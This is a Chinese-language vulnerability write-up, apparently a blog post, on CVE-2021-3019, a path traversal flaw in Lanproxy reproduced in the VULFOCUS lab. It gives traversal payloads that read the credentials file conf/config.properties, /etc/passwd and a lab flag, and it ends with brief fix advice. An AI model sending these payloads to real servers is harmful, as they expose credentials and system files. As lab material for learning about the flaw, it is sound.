当前位置: 首页 > news >正文

[文件读取]lanproxy 文件读取 (CVE-2021-3019)

1.1漏洞描述

漏洞编号CVE-2021-3019
漏洞类型文件读取
漏洞等级
漏洞环境VULFOCUS
攻击方式

描述: Lanproxy 路径遍历漏洞通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

1.2漏洞等级

高危

1.3影响版本

 Lanproxy

1.4漏洞复现

1.4.1.基础环境

靶场VULFOCUS
工具BurpSuite

1.4.2.前提

  • 网站后台地址:

  • 后台管理账密:

  • 后台登录地址 :

1.5深度利用

1.5.1漏洞点

/../conf/config.properties

查看内部网连接的凭据

查看/etc/passwd

../../../../../etc/passwd

查看tmp/flag

../../../../../tmp/flag

拿到flag

flag-{bmh909dda7b-bfc7-464d-97ee-0c81c36001b2}

 

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

相关文章:

  • 33.算术运算符
  • K8S知识点(十)
  • arcgis--NoData数据处理
  • 迅为iTOPRK3588开发板系统定制(无法联网)
  • IDEA 使用Reset Current Branch to Here 进行git 版本控制,图文操作
  • uniapp发行web页面在老版本浏览器打开一片空白
  • Interactive Analysis of CNN Robustness
  • 通过顶顶通呼叫中心中间件玩转FreeSWITCH媒体流
  • 人工智能与充电技术:携手共创智能充电新时代
  • junit写搜索树测试
  • 赛宁网安入选国家工业信息安全漏洞库(CICSVD)2023年度技术组成员单
  • OpenCV+计算摄影
  • 深度探究深度学习常见数据类型INT8 FP32 FP16的区别即优缺点
  • 数据分析实战 | 多元回归——广告收入数据分析
  • [Kettle] 记录处理
  • 【广州华锐视点】海外制片人VR虚拟情景教学带来全新的学习体验
  • 【 云原生 | K8S 】kubectl 详解
  • classification_report分类报告的含义
  • 如何在 macOS 中删除 Time Machine 本地快照
  • Linux SSH免密登录
  • 多少Moreless:向世界展示现代中式家具的生活美学
  • 海昏侯博物馆展览上新,“西汉帝陵文化展”将持续展出3个月
  • 李伟任山东省委常委、省纪委书记
  • 国家统计局公布2024年城镇单位就业人员年平均工资情况
  • 国税总局上海市税务局通报:收到王某对刘某某及相关企业涉税问题举报,正依法依规办理
  • “免签圈”扩容,旅游平台:今年以来巴西等国入境游订单显著增加